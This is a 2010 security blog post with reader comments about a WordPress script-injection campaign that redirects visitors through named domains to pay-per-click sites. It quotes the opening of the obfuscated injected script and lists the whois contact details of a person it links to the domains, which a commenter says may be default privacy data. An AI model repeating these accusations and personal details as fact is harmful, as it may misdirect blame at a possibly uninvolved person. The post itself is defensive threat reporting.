Sponsored by..

Thursday 4 February 2010

Sergey Ryabov / director@climbing-games.com strikes again

There's a somewhat unusual spate of injection attacks doing the rounds, code is being injected into the middle of victim pages through an unknown flaw, starting document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D and then going on for a bit.. deobfuscating the code actually leads to a second layer of obfuscation, but once that is decoded it becomes clearer.

The injected code points to itsallbreaksoft.net


This then bounces through paymoneysystem.info/in.cgi?michaeleknowlton before hitting a seemingly random PPC search engine site hosted on 95.211.27.154, for example sdeh.net/iframe.html. Sophos have an excellent write-up of the anatomyof the injection attack here, and it's pretty clear that somebody is ripping somebody else off for PPC traffic.. its hard to say who the victims actually are.

The domains itsallbreaksoft.net and paymoneysystem.info belong to the same person, these are interesting because of the registration details:

Nexton Limited
Ryabov Sergey (director@climbing-games.com)
+79219270961
Fax: +79219270961
Scherbakova st., 6-38
Saint-Petersburg, 197375
RU
These contact details are very well known for very bad things. Incidentally, the registrar is ruler-domains.com, also an enterprise registered to "Sergey Ryabov" (if that's a real person).

It's all kind of strange as there doesn't appear to be a malware payload, which is good. But because of the way click arbitrage works, finding the real victims and villains is tricky, although interested researchers may want to have a poke around.

7 comments:

wahnula said...

Hey Dynamoo,

I just ran a quick Google search of the code snippet you provided, and the top spot in Google is not a malware alert site, it is an anti-abortion site. The code is embedded in the source code for the page, but it renders like the original site.

This may be a dumb question, but is this a sign of hacking/injecting?

Although I don't quite agree with their views, I was going to warn them but see no contact link on that page. Thanks

Conrad Longmore said...

It's a Wordpress injection attack, so the obfuscated code snippet turns up on victim sites rather than the payload site.

Right at the moment this appears to be account for most of the injection attacks that I am seeing.

PROseo P4tr4sch said...

Hi,
my wordpress blog is infected with that. Can you tell how to fix it please? ty

PROseo P4tr4sch said...

found it in the haeder.php and deleted it.. thx

MysteryFCM said...

I've been on to Leaseweb and had sdeh.net suspended (aling with rich-traffic.com, which was also related to this) :o)

Unknown said...

Idownloadstream.com is related to the same individual/company.

It is a complete scam.
When looking for a download, the site will rank first in the search.
Site offers a 3 day test for $1.95.
But it charges $80.69 for 6 months in your back (rip-off).
When you login on the site, you find out that the file you expected doesn't exist (bait & switch).
Then you try to get a refund, but it goes through web-support-center (anonymous).
The site's activity has grown tremendously since January 2010.

The owner is Russian, whom is known for its lawlessness internationally:
Nexton Limited
Ryabov Sergey (director@climbing-games.com), probably a fake name too.
+79219270961
Fax: +79219270961
Scherbakova 6-38
Saint-Petersburg, 197375
Russia

Mr. Hyde said...

Ruler-domains.com is simply a reseller of the registrar Enom.com.

The director@climbing-games.com etc is the default info they used to put in if their customers opted for a whois-protect. More recently they started to use Enom's own whois-protection instead.

Sergey Ryabov is a real person, the owner of the ruler-domains.